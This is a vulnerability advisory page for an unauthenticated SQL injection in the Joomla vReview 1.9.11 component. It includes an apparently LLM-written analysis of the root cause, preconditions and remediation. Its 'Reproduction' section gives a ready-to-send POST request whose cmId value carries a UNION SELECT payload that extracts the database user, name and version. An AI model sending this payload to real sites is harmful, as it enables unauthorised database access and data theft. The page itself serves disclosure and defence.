Joomla vReview 1.9.11 SQL Injection via editReview
Description
Joomla Component vReview 1.9.11 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the cmId parameter. Attackers can send POST requests to the editReview task endpoint with URL-encoded SQL UNION statements in the cmId parameter to extract database information including usernames, passwords, and database versions.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
1Patches
Vulnerability mechanics
Root cause
"Missing input sanitization in the cmId parameter allows SQL injection."
Attack vector
An unauthenticated attacker sends a POST request to `/index.php?option=com_vreview&task=editReview` with a URL-encoded SQL UNION payload in the `cmId` parameter [ref_id=1]. The payload decodes to `1 union select CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())-- -`, which extracts the database user, name, and version. No authentication is required, making this a low-complexity remote attack.
Affected code
The vulnerability resides in the Joomla! Component vReview version 1.9.11. The `cmId` parameter passed to the `editReview` task endpoint is not sanitized before being used in SQL queries, allowing injection of arbitrary SQL statements.
What the fix does
The advisory does not include a published patch. To remediate, the application must properly sanitize or parameterize the `cmId` input before it is used in SQL queries. Without a fix, any unauthenticated visitor can inject arbitrary SQL commands.
Preconditions
- configThe Joomla! vReview component 1.9.11 must be installed and accessible over HTTP.
- authNo authentication or session is required; the attacker can be unauthenticated.
- networkThe attacker must be able to send HTTP POST requests to the target server.
- inputThe `cmId` POST parameter is accepted without sanitization.
Reproduction
Send a POST request to `http://TARGET/[PATH]/index.php?option=com_vreview&task=editReview` with body `cmId=1%20union%20select%20CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--%20-`. The response will include the database user, name, and version in the output [ref_id=1].
Generated on Jun 20, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
4- www.exploit-db.com/exploits/46227mitreexploit
- www.vulncheck.com/advisories/joomla-vreview-sql-injection-via-editreviewmitrethird-party-advisory
- wdmtech.commitreproduct
- extensions.joomla.org/extensions/extension/clients-a-communities/ratings-a-reviews/vreview/mitreproduct
News mentions
0No linked articles in our index yet.